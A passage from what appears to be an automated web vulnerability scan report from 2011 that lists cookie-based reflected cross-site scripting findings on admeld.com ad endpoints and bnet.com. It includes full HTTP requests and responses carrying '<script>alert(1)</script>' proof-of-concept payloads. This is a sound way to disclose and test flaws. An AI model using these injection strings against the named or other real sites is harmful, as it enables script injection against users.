Path:	/ad/iframe/489/cnetnews/728x90/cnetnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93fb5"><script>alert(1)</script>9144b9586a2 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/728x90/cnetnews_atf?t=1303946305005&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb993fb5"><script>alert(1)</script>9144b9586a2; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjY5LCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjEtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI0YjkwNjc5MS02YTAyLTQ3NjQtOTZiMi1kYjczYWViMTlkMDciLCAgdXNlcjogICAgICAgICAiYWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5OTNmYjUiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD45MTQ0Yjk1ODZhMiIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY25ldG5ld3NfYXRmIiwgIGRpdjogICAgICAgICAgIjRiOTA2NzkxLTZhMDItNDc2NC05NmIyLWRiNzNhZWIxOWQwNyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2F0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0ODcsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MTIwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjk2NTAsICJidXkiOjEyNDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg2OTcsICJidXkiOjE5NiwibHAiOiJodHRwOi8vd3d3LnNwcmludC5jb20vbGFuZGluZ3Mvd2Vib2ZmZXJzL3NlZWsuaHRtbD9FQ0lEPU1BOkFCOjIwMTEwNDE3OldFOkxWRTpTRUVLOlYyOjcyOHg5MCIsImFuIjoiU3ByaW50IEVURCIsInN0YXR1cyI6IjAuMTUiLCJmaWQiOjYwNDQsICJmY3BtIjoiMTAwMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODgwMiwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDcifQ==
Content-Length: 2054
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb993fb5"><script>alert(1)</script>9144b9586a2&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.850. http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cnetnews/728x90/cnetnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1f4"><script>alert(1)</script>fc939ed272e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/728x90/cnetnews_atf?t=1303946305005&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb97c1f4"><script>alert(1)</script>fc939ed272e; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjY5LCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjEtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJjYjFiYTRiNy0yOGJmLTQ5NTMtOGMyNC0wNWJjZWRhMjQxNTYiLCAgdXNlcjogICAgICAgICAiYWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5N2MxZjQiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5mYzkzOWVkMjcyZSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY25ldG5ld3NfYXRmIiwgIGRpdjogICAgICAgICAgImNiMWJhNGI3LTI4YmYtNDk1My04YzI0LTA1YmNlZGEyNDE1NiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2F0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0ODcsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MTIwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjk2NTAsICJidXkiOjEyNDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg2OTcsICJidXkiOjE5NiwibHAiOiJodHRwOi8vd3d3LnNwcmludC5jb20vbGFuZGluZ3Mvd2Vib2ZmZXJzL3NlZWsuaHRtbD9FQ0lEPU1BOkFCOjIwMTEwNDE3OldFOkxWRTpTRUVLOlYyOjcyOHg5MCIsImFuIjoiU3ByaW50IEVURCIsInN0YXR1cyI6IjEuMDkiLCJmaWQiOjYwNDQsICJmY3BtIjoiMTAwMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODgwMiwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMTEifQ==
Content-Length: 2054
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb97c1f4"><script>alert(1)</script>fc939ed272e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.851. http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eac"><script>alert(1)</script>ef4cf098f6c was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb965eac"><script>alert(1)</script>ef4cf098f6c; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAidXJiYW5iYWJ5IiwgIGFkOiAgICAgICAgICAgMjk5MTExNiwgIG5ldHdvcms6ICAgICAgImhvdXNlIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjE5NDNkNjdjLTZmOWMtNDc5Yi04ODEwLThiMWY0M2ZlOGRmYyIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjk2NWVhYyI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmVmNGNmMDk4ZjZjIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJ1cmJhbmJhYnlfYXRmIiwgIGRpdjogICAgICAgICAgIjE5NDNkNjdjLTZmOWMtNDc5Yi04ODEwLThiMWY0M2ZlOGRmYyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAidXJiYW5iYWJ5X2F0ZiIsICBydWxlOiAgICAgICAgICJ1cmJhbmJhYnlfYXRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODQwNCwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjkwNzIsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYwMiwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODY0OSwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuamVlcC5jb20vYnJvd3Nlcl91cGdyYWRlLyIsImFuIjoiQ2hyeXNsZXIiLCJzdGF0dXMiOiIwLjEzIiwiZmlkIjo2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3NTQsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM4In0=
Content-Length: 2061
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:28 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb965eac"><script>alert(1)</script>ef4cf098f6c&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.852. http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae33"><script>alert(1)</script>721c40420de was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb94ae33"><script>alert(1)</script>721c40420de; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAidXJiYW5iYWJ5IiwgIGFkOiAgICAgICAgICAgMjk5MTExNiwgIG5ldHdvcms6ICAgICAgImhvdXNlIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjVhNTJmODA0LWM1OGEtNDcwNC1hMzc1LWU1Yjk1ZmE1MjBjZCIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjk0YWUzMyI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjcyMWM0MDQyMGRlIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJ1cmJhbmJhYnlfYXRmIiwgIGRpdjogICAgICAgICAgIjVhNTJmODA0LWM1OGEtNDcwNC1hMzc1LWU1Yjk1ZmE1MjBjZCIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAidXJiYW5iYWJ5X2F0ZiIsICBydWxlOiAgICAgICAgICJ1cmJhbmJhYnlfYXRmIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODQwNCwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjkwNzIsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYwMiwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODY0OSwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuamVlcC5jb20vYnJvd3Nlcl91cGdyYWRlLyIsImFuIjoiQ2hyeXNsZXIiLCJzdGF0dXMiOiIwLjEzIiwiZmlkIjo2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3NTQsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ2In0=
Content-Length: 2061
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:28 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb94ae33"><script>alert(1)</script>721c40420de&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.853. http://www.bnet.com/ [XCLGFbrowser cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnet.com
Path:	/

Issue detail

The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32a48</script><script>alert(1)</script>0daa526f070 was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:36:47 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 91449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
ipt'); cs.type = 'text/javascript'; cs.async = true;
cs.src = ('https:' == document.location.protocol?'https://':'http://')+'static.crowdscience.com/start-c2e7cdddce.js?cp0=[Cg8JIk24ijttAAAASDs32a48</script><script>alert(1)</script>0daa526f070]&cp1=[6gBIgwoPOVYAAHGXggYAAAAF]';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(cs,s);
})();
</script>
...[SNIP]...

3.854. http://www.bnet.com/management [XCLGFbrowser cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnet.com
Path:	/management

Issue detail

The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2294b</script><script>alert(1)</script>315da78a2cf was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

